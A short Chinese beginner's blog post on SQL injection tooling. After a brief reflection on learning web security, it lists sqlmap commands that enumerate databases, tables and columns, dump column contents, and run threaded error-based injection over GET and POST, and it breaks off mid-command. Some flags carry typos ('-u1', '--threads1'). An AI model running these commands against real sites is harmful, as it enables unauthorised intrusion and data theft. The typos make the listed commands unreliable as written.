SQL注入工具使用初级理论
![](https://i-blog.csdnimg.cn/blog_migrate/925006d1b2616d49ba19a42e4f14acc1.jpeg)
菜鸟的自我反思
一个合格的菜鸟应该知道自己该干什么,不该干什么。作为一个web安全的菜鸟,刚开始的时候应该以工具入手,但这远远不是终点。工具是死的,而人的思维是灵活的。从工具入手,提升个人渗透的乐趣,在进一步理解原理进行魔改。
sqlmap常用指令
爆破与提升
常规爆破命令:
sqlmap -u “目标网址” --dbs
sqlmap -u1 “目标网址” -D [数据库名] --tables
sqlmap -u “目标网址” -D [数据库名] -T [表名] --columns
sqlmap -u “目标网址” -D [数据库名] -T [表名] -C [列名] --dump
提升部分:
指定报错注入,并加入多线程–GET
sqlmap -u “目标网址” --dbs --batch --threads1 10 --technique E
指定报错注入,并加入多线程–POST–密码登录
sqlmap -u “目标网址” --data "